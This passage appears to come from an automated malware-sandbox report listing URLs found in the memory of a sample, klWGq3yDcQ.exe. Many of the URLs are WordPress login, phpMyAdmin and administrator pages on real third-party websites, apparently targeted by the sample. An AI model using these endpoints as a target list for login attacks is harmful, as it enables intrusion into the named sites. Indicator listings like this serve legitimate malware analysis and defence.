Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/lg-video
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/animejs/2.0.2/anime.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.19.0/TweenLite.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery-cookie/1.4.1/jquery.cookie.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.4/js/lightgallery.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/scrollify/1.0.5/jquery.scrollify.min.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/stickyfloat/7.5.0/stickyfloat.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ce-logic.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/l(
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/m
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.godaddy.com/repository/~)
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cms.e.jimdo.com/app/cms/logout.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/ui/1.12.1/jquery-ui.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.or
Source: klWGq3yDcQ.exe, 00000001.00000002.2877970062.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-admin/css/forms.min.css?ver=5.2.19
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-admin/css/l10n.min.css?ver=5.2.19
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-admin/css/login.min.css?ver=5.2.19
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-includes/css/buttons.min.css?ver=5.2.19
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-includes/css/dashicons.min.css?ver=5.2.19
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coralparkchristian.org/wp-login.php?action=lostpassword
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.la2-c2-ia5.salesforceliveagent.com/chat
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://daisyokogyo.co.jp/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://directlendersllc.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dstaq.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dstaq.com/phpmyadmin/1
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dstaq.com/phpmyadmin/g
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eco-landeck.at/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884890826.0000000003E7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eco-landeck.at/administrator/G-
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000414C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://embed.tawk.to/5d1dd8d87a48df6da242ee76/default
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-admin/js/password-strength-meter.min.js?ver=6.3.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-admin/js/user-profile.min.js?ver=6.3.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/underscore.min.js?ver=1.13.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-includes/js/zxcvbn-async.min.js?ver=1.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.00000000040A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://engel-firm.com/wp-login.php?action=lostpassword
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/plugins/custom-facebook-feed/js/cff-scripts.js?ver=2.16.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-image-cdn/dist/imag
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/plugins/responsive-accordion-and-collapse/js/accordion.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/plugins/responsive-accordion-and-collapse/js/bootstrap.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/assets/animations/animations.min.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/js/menu.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/js/parallax/translate3d.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/js/plugins.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-content/themes/betheme/js/scripts.js?ver=17.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.13.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.13.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gasp-ga.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gatewaytoearlylearning.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/css/forms.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/css/l10n.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/css/login.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/js/password-strength-meter.min.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-admin/js/user-profile.min.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-content/uploads/2023/05/favicon.png
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/css/buttons.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/css/dashicons.min.css?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/underscore.min.js?ver=1.13.4
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/wp-util.min.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-includes/js/zxcvbn-async.min.js?ver=1.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2879810697.00000000039EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gccb.co.in/wp-login.php?action=lostpassword
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gethsemane.org/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gethsemane.org/phpmyadmin/Y
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getquipu.com/
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getquipu.com/ca/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004034000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getquipu.com/en/
Source: klWGq3yDcQ.exe, 00000001.00000003.2251172424.000000004E5EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://getquipu.com/fr/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grantstech.io/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grantstech.io/phpmyadmin//
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greenrworld.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/#/schema/logo/image/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/#organization
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/#website
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/?s=
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/comments/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/feed/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/phpmyadmin/E
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-admin/js/user-profile.min.js?ver=6.4.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/3d-flipbook-dflip-lite/assets/js/dflip.min.js?ver=2.
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/chaty/js/cht-front-script.min.js?ver=3.1.81695051900
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.3
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.8.3
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/dg-divi-carousel/scripts/frontend-bundle.min.js?ver=
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/plugins/dg-divi-carousel/scripts/swiper.min.js?ver=2.0.26
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/themes/Divi/core/admin/js/common.js?ver=4.23.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/themes/Divi/includes/builder/feature/dynamic-assets/assets/j
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/themes/Divi/js/scripts.min.js?ver=4.23.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-content/uploads/2022/04/cropped-Flat-Icon.jpg
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-includes/css/dist/block-library/style.min.css?ver=bb270fba1988038f56
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=bb270fba1988038
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-includes/js/wp-util.min.js?ver=bb270fba1988038f5680f75b7475565e
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/wp-login.phpater.group995
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruporegiosafety.com/xmlrpc.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/phpmyadmin/U
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/wp-content/plugins/age-gate/dist/all.js?ver=3.3.0
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/wp-content/plugins/dearpdf-lite/assets/js/dearpdf-lite.min.js?ver=2.0.38
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/wp-content/themes/Divi/core/admin/js/common.js?ver=4.23.1
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/wp-content/themes/Divi/includes/builder/feature/dynamic-assets/assets/js/jqu
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hightideinc.com/wp-content/themes/Divi/js/scripts.min.js?ver=4.23.1
